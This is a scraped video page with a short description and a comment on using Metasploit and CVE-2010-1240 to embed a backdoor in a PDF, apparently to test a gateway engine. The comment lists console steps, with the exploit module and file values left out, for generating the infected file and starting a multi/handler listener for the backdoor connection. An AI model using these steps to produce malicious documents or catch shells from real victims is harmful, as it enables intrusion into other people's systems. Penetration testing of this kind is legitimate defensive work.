Creating a backdoor exploit for Pdf Infected File

preview_player
Показать описание
Creating a infected pdf file using metasploit with CVE-2010-1240.
Going to test gw engine protected file.

#cybersecurity #hacking #security #technology #hacker #infosec #tech #ethicalhacking #malware #cyber #cybercrime #kalilinux #programming #hackers #linux #hack #cyberattack #pentesting #computerscience #ethicalhacker #python #dataprotection #informationtechnology #cybersecurityawareness #it #itsecurity #informationsecurity #iot #privacy #bhfyp
Рекомендации по теме
Комментарии
Автор

Command used:
#Select the metasploit exploit:
use

#Display avaliable options
show options

#set the pdf document we want to inject a backdoor in
set INFILENAME

# generate the file
exploit


#Listing for the backdoor connection:
use exploit/multi/handler
exploit

xMircale